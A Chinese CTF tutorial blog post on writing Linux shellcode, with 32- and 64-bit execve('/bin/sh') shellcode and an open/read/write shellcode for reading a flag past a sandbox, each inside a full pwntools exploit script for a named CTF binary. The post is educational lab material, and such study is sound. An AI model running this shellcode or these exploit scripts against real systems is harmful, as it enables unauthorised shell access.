一篇文章彻底清楚shellcode(精品)

原创 已于 2022-03-25 13:29:15 修改
· 9.1k 阅读 · 44 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn #linux

于 2022-03-08 21:01:57 首次发布
本文详细介绍了如何在32位和64位程序中利用shellcode实现系统调用来获取shell。通过实例分析了32位程序中使用eax, ebx等寄存器传递参数,以及64位程序中使用rdi, rsi等寄存器进行系统调用的方法。同时,文章还讨论了在开启沙箱环境下的shellcode编写技巧,包括绕过strlen检查和使用open, read, write系统调用来读取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

shellcode 知识汇总

文章目录

1.没开沙箱(此时我们可以系统调用get shell)

(一)32位程序系统调用

32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄存器(esp,ebp).
下边我们就来看一种系统调用方式及其构造:

//这是我们要构造的:
execv('/bin/sh',0,0)   //从左到右一次传参数进入ebx,ecx,edx寄存器
汇编如下:
shell = '''
push 0   // 隔开/bin/sh
push 0x0068732f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
xor edx,edx
xor esi,esi
mov eax, 0xb   //execv的系统调用号为11,即0xb
int 0x80      //进入系统调用
'''

执行上述shellcode即可getshell.

picoctf_2018_shellcode

这里选取一道buuctf上的一道题目来加深一下理解
题目
检查:
在这里插入图片描述
保护机制都没开,很明显应该是要写shellcode
漏洞分析:
程序是不可以Ctrl+f5的,跟进发现问题在这:
在这里插入图片描述
如果我们控制了rax寄存器,就可以执行shellcode了,大家可以自己分析,动态调试,发现我们输入的数据正好会被传入rax寄存器中,进行执行,所以下边我们来进行shellcode的编写

#!/usr/bin/env python
#coding=utf-8
from pwn import *
elf = ELF('./PicoCTF_2018_shellcode')
#io = remote('node4.buuoj.cn',28317)
io = process('./PicoCTF_2018_shellcode')
libc = elf.libc
context(log_level='debug',os='linux',arch='amd64')

io.recvuntil('!')

gdb.attach(io)

shellcode = '''
push 0
push 0x0068732f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
xor edx,edx
xor esi,esi
mov eax, 0xb
int 0x80
'''
io.sendline(asm(shellcode))

io.interactive()

在这里插入图片描述

(二)64位程序系统调用

64位程序通过寄存器传参,当参数少于7个时,程序将参数从左到右依次传递至rdi,rsi,rdx,rcx,r8,r9.当参数多于7个时,如下传参

    H(a, b, c, d, e, f, g, h);
    a->%rdi, b->%rsi, c->%rdx, d->%rcx, e->%r8, f->%r9
    h->8(%esp)
    g->(%esp)
    call H

64位进行系统调用:

mov rbx, 0x68732f6e69622f   //这里没有严格的传参限制,也可以传到其他寄存器中
push rbx   //'/bin/sh'压入栈
push rsp   //压入rsp
pop rdi    //'/bin/sh'传递给rdi
xor esi, esi   //将esi置0           
xor edx, edx   //将edx置0           
push 0x3b      //系统调用号
pop rax        //这里也可以直接去掉'push 0x3b;pop rax'改为mov rax, 0x3b
syscall        //系统调用

我们还是选取一道题目来加深印象

mrctf2020_shellcode

题目地址

检查:
在这里插入图片描述
程序分析:
程序会让我们输入0x400的字节,并通过分析会将我们输入的字节传到rax寄存器中,所以我们还是通过控制rax寄存器来执行shellcode从而get shell.
在这里插入图片描述
exp:

#!/usr/bin/env python
#coding=utf-8

from pwn import*

#io =remote("node4.buuoj.cn",25981)
io = process('./mrctf2020_shellcode')
elf = ELF('./mrctf2020_shellcode')
#libc = elf.libc
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(log_level='debug',os='linux',arch='amd64')

io.recvuntil('!')

shellcode = '''
mov rbx, 0x68732f6e69622f
push rbx
push rsp 
pop rdi
xor esi, esi              
xor edx, edx              
push 0x3b
pop rax
syscall
'''
#gdb.attach(io)
io.sendline(asm(shellcode))

io.interactive()

在这里插入图片描述

2.开启沙箱(orw读flag)

gwctf_2019_shellcode

目前只做到了64位的orw题目,现在就放64位的题目啦
64位orw题目地址
例行检查:
在这里插入图片描述
开了canary,和pie,但没什么影响
在这里插入图片描述
这里是开了沙箱的,师傅们也可以进去查看,这里我就不展示了
main函数还是无法反汇编,同样问题是出在call rax
在这里插入图片描述
我们思路是控制rax寄存器,执行我们的shellcode,但程序里还会有一个检查机制,在is_printable函数里,
在这里插入图片描述
这里会有一个strlen,’/x00’截断,我们可以写shellcode时写入\x00绕过检查
剩下的思路就很简单了,系统调用open打开flag所在路径,系统调用read读flag,(我们可以选择将flag读到栈中,bss段允许的话我们也可以将其读入bss段,就这道题目而言,我将其读在了栈中,有兴趣的师傅也可以尝试将flag读在bss段中),系统调用write,写出flag

直接上exp:

#!/usr/bin/env python
#coding=utf-8
from pwn import *
elf = ELF('./gwctf_2019_shellcode')
#io = remote('node4.buuoj.cn',25438)
io = process('./gwctf_2019_shellcode')
libc = elf.libc
context(log_level='debug',os='linux',arch='amd64')

#gdb.attach(io)
shellcode = '''
//调用open()
push 0  //绕过strlen()检查
push 0
mov r15, 0x67616c662f2e
push r15
mov rdi, rsp
mov rsi, 0
mov rax, 2
syscall
//调用read()
mov r14, 3
mov rdi, r14
mov rsi, rsp
mov rdx, 0xff
mov rax, 0
syscall
//调用write()
mov rdi,1
mov rsi, rsp
mov rdx, 0xff
mov rax, 1
syscall
'''
payload = asm(shellcode)
print len(payload)

io.sendline(payload)
#io.sendline('A')

io.interactive()

在这里插入图片描述
读出了flag!!!
以上就是这段时间对shellcode题目的一些总结,师傅们轻点喷哈哈哈哈哈

手戳shellcode编写 第一课(动态函数地址调用函数)
啊渊的专栏
08-21 525
在程序免杀中,我们通常不会直接通过函数名称方式来调用函数,一般都是通过执行shellcode来执行我们需要的代码。如果直接将exe文件解析出来的shellcode会发现这些shellcode不能直接运行,因为函数地址调用的问题。因此我们需要动态获取函数地址来调用shellcode。为了了解shellcode的基础,我们先使用c++源码方式来学习,如果动态的获取函数地址,然后再使用汇编编写以下功能实现shellcode的完成编写。
Shellcode
weixin_43916678的博客
07-07 9143
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
网络攻防技术——shellcode编写
学习记录
02-27 3359
一、题目 shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验室的目的是帮助学生理解这些技术,以便他们能够编写自己的shellcode。 编写shellcode有几个挑战,一个是确保二进制文件中没有0x00,另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决,有几种方法可以解决它。第二个挑战
171224 逆向-EvilExe的Shellcode分析
whklhhhh的博客
12-24 528
1625-5 王子昂 总结《2017年12月24日》 【连续第450天总结】 A. JarvisOJ-EvilExe(Shellcode分析) B. ShellCode分析将Shellcode复制到OD随便一段空白处中进行分析 注意跳转执行的时候是从第二个字节开始,第一个字节0xEE是没有用的右击第二个字节,设置EIP进行执行 可以发现它动态获取Kernel32.dll和通过LoadL
Cobalt Strike shellcode分析
最新发布
A1_3_9_7的博客
03-28 1035
shellcode入口,开始进行调试进入0X00D1983F函数,,找到函数后循环都会经过这里push了wininet字符串和0x726774C进入ebp的call分析第一次拿的是本身exe第二次拿的是ntdll.dll然后拿到ntdll.dll的导出表地址导出函数个数然后进行遍历与0x0726774c进行比较,看是否是需要的函数最后遍历出来找的是LoadLibrary地址,通过LoadLibrary调用起了wininet.dll。
shellcode
WEB安全测试学习中……
03-09 1236
<br />Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。<br />另外,Shellcode一般是作为数据发送给受攻击服务的。 <br />Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shell
Shellcode详解
N阶二进制的博客
06-18 3702
Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。
ShellCode详解一
gongxie0235的博客
05-11 974
这些数据会导致什么问题呢,那就是当当我们的shellcode代码调用这些数据地址时,执行shellcode的进程若不是我们shellcode的进程则会出现一些无法预料错误,它是找不到这些数据的地址的。大功告成,现在已经没有那些杂乱的数据了,剩下的就可以不用管了,它并不影响我们的shellcode代码,接下来就到了我们的正题了(编写shellcode代码),哈哈哈,别着急,请听下回分解^ - ^从上图中可以看到,导入表中的库明显少了,那么剩下的这个库怎么去掉呢,别着急,我们继续往下走。
shellcode分析技巧
m0_60571990的博客
10-08 531
shellcode分析技巧
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
Alaris:一种保护性和低级Shellcode加载程序,可击败现代EDR系统
05-13
Alaris是一种新的,隐蔽的shellcode加载程序,能够绕开今天(02/28/2021)的大多数EDR系统。 它使用多个已知的TTP来帮助保护恶意软件及其执行流程。 其中一些功能是: Shellcode加密(AES-CBC 256) 通过新直接...
shellcode加载器
10-02
Shellcode加载器是一种技术,主要用于在目标系统上执行任意代码,通常用于渗透测试或恶意软件开发。Shellcode是一小段机器码,可以直接被CPU执行,而无需通过解释器或虚拟机。这种加载器的设计旨在绕过安全机制,...
pe_to_shellcode:将PE转换为Shellcode
05-09
同样,以一种方式修改PE文件的头,使您可以从头开始执行注入的缓冲区-就像使用shellcode一样。 它将自动找到存根,并继续加载完整的PE。 建物 下载最新。 克隆 使用递归克隆将存储库与所有子模块一起获取: git ...
shellcode搜集
weixin_30493321的博客
03-30 116
好像WINDOWS版本都行的 利用FatalAppExit 函数 弹出对话框 然后结束 shellcode串很短 00406032 B2 30 mov dl,0x30 00406034 64:8B12 mov edx,dword ptr fs:[edx] 00406037 8B52 0C mov edx,dw...
shellcode实践&理解
leeham的博客
08-27 427
shellcode实践&amp;理解 【干货分享】手把手简易实现shellcode及详解 C语言源码格式 #include&lt;unistd.h&gt; #include&lt;stdlib.h&gt; char *buf[]={"/bin/sh",NULL}; void main() { execve("/bin/sh",buf,0); exit(0); } ...
ShellCode
weixin_30954607的博客
08-13 387
典型栈溢出A-代码分析ShellCode-A#include "pch.h"#include <iostream>#include <Windows.h>#define PASSWORD "15PB"// GS: 用于判断当前是否产生了溢出,依赖的是检查安全 cookie, CheckStackValue// inline: 没有关闭代码优化,导致一些简单的代码被...
Shell Code 原理深入剖析
masefee C/C++游戏编程
08-06 5401
这两天都一直在解析3D模型数据。今天闲暇之余写了段测试代码。分析下黑客们用的缓冲区溢出攻击原理及Shell code原理。好,直接进入正题。有什么说得不对的地方还望大家纠正。嘿嘿!首先来这么一段小小的测试代码:void test( void ){    cout }int main( void ){    int a[ 1 ];    a[ 3 ] = ( int )test;    return
恶意代码分析-第十九章-shellcode分析
每昔的博客
09-13 2091
笔记 shellcode:一个可执行代码的有效载荷,包含可执行代码 加载shellcode分析:在IDApro中分析时,选择处理器类型Interl 80x86 processers,并选择32-bit disassembly 使用位置无关代码: 第一条和第二条指令都是通过将EIP寄存器指定的当前位置加上一个保存在指令中的相对偏移值来计算。所以是位置无关代码 第三条指令是一个访问全局数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值